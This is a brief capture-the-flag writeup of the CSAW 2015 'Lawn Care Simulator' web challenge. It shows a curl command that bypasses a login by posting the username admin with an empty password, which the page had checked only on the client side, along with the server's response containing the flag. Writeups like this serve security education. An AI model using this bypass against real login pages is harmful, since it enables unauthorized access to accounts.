CSAW 2015 - Lawn Care Simulator (200pts) writeup

The challenge description was: http://54.165.252.74:8089/

This web challenge was really easy, actually it was so easy that I think it wasn't meant to be that way. When you visit the link you are greeted with the following screen:

CSAW 2015 - Lawn Care Simulator (200pts) writeup - 01

Checking for SQL injection wasn't returning anything indicating it was what we had to do, so I checked the network traffic while trying to log in and got the following POST data:

**username:**test **password:**098f6bcd4621d373cade4e832627b4f6

Trying to log without any password wasn't possible but checked on the client side, so after trying it with curl in a terminal:

mrt$ curl 'http://54.165.252.74:8089/premium.php' --data 'username=admin&password='
<html>
<head>
<title>Lawn Care Simulator 2015</title>
<script src="//code.jquery.com/jquery-1.11.3.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css">
</head>
<body>
<h1>flag{gr0wth__h4ck!nG!1!1!</h1></body></html>

We got our flag:

flag{gr0wth__h4ck!nG!1!1!}